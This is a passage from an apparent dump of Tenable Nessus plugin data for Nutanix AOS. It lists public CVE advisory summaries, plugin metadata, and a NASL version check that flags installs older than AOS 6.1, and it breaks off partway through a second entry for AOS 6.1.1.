The vulnerability\n affects all currently maintained BIND 9 branches (9.11, 9.11-S, 9.16, 9.16-S, 9.17) as well as all other\n versions of BIND 9. (CVE-2021-25215)\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java\n SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized creation, deletion or modification access to critical data or all\n Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability\n applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. It can also be exploited by supplying untrusted data to APIs in the\n specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). (CVE-2021-2161)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are\n vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI\n LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by\n limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. 
This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. 
(CVE-2021-40438)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissible length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. 
OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. 
Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. 
Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). 
Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. 
This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the Routing decision classifier in the Linux kernel's Traffic Control networking\n subsystem in the way it handled changing of classification filters, leading to a use-after-free condition.\n This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat\n from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3715)\n\n - An issue was discovered in the Linux kernel before 5.2.6. 
On NUMA systems, the Linux fair scheduler has a\n use-after-free in show_numa_stats() because NUMA fault statistics are inappropriately freed, aka\n CID-16d51a590a8c. (CVE-2019-20934)\n\n - In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB\n driver) mishandles invalid descriptors, aka CID-a246b4d54770. (CVE-2020-11668)\n\n - The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because\n the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads\n to writing an arbitrary value. (CVE-2021-33033)\n\n - In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an\n hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value. (CVE-2021-33034)\n\n - fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer\n allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an\n unprivileged user, aka CID-8cae8cd89f05. (CVE-2021-33909)\n\n - encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write\n access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character\n sequence. (CVE-2021-26937)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. 
The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a\n malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95. This affects drivers/hid/hid-\n axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-\n tmff.c, and drivers/hid/hid-zpff.c. (CVE-2019-19532)\n\n - In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could\n lead to local information disclosure with no additional execution privileges needed. User interaction is\n not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-140550171\n (CVE-2020-0427)\n\n - A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem\n allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate\n privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as\n system availability. (CVE-2020-14351)\n\n - In the Linux kernel through 5.8.7, local attackers able to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c, aka CID-1cc5ef91d2ff.\n (CVE-2020-25211)\n\n - A flaw was found in the Linux kernel in versions before 5.9-rc7. 
Traffic between two Geneve endpoints may\n be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE\n tunnel, allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from\n this vulnerability is to data confidentiality. (CVE-2020-25645)\n\n - A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was\n using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of\n bounds. The highest threat from this vulnerability is to data confidentiality. (CVE-2020-25656)\n\n - A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw\n allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that\n relies on UDP source port randomization is indirectly affected as well on the Linux Based Products\n (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4,\n SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE\n W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All\n versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7\n LTE EU: Version (CVE-2020-25705)\n\n - In drivers/target/target_core_xcopy.c in the Linux kernel before 5.10.7, insufficient identifier checking\n in the LIO SCSI target code can be used by remote attackers to read or write files via directory traversal\n in an XCOPY request, aka CID-2896c93811e3. For example, an attack can occur over a network if the attacker\n has access to one iSCSI LUN. The attacker gains control over file access because I/O operations are\n proxied via an attacker-selected backstore. 
(CVE-2020-28374)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\n - In the Linux kernel 4.14 longterm through 4.14.165 and 4.19 longterm through 4.19.96 (and 5.x before 5.2),\n there is a use-after-free (write) in the i915_ppgtt_close function in drivers/gpu/drm/i915/i915_gem_gtt.c,\n aka CID-7dc40713618c. This is related to i915_gem_context_destroy_ioctl in\n drivers/gpu/drm/i915/i915_gem_context.c. (CVE-2020-7053)\n\n - A flaw was found in the way memory resources were freed in the unix_stream_recvmsg function in the Linux\n kernel when a signal was pending. This flaw allows an unprivileged local user to crash the system by\n exhausting available memory. The highest threat from this vulnerability is to system availability.\n (CVE-2021-20265)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions\n (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being\n called with out-of-range scalars, possibly resulting in incorrect results. This flaw allows an attacker to\n force an invalid signature, causing an assertion failure or possible validation. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. 
(CVE-2021-20305)\n\n - In BIND 9.8.5 -> 9.8.8, 9.9.3 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and\n 9.16.8-S1 -> 9.16.13-S1 of BIND 9 Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11\n of the BIND 9.17 development branch, when a vulnerable version of named receives a malformed IXFR\n triggering the flaw described above, the named process will terminate due to a failed assertion the next\n time the transferred secondary zone is refreshed. (CVE-2021-25214)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. 
The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. 
(CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-1.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.1', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.1 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.1', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.1 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-12T21:09:18", "description": "The version of AOS installed on the remote host is prior to 6.1.1. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.1.1 advisory.\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21248)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability 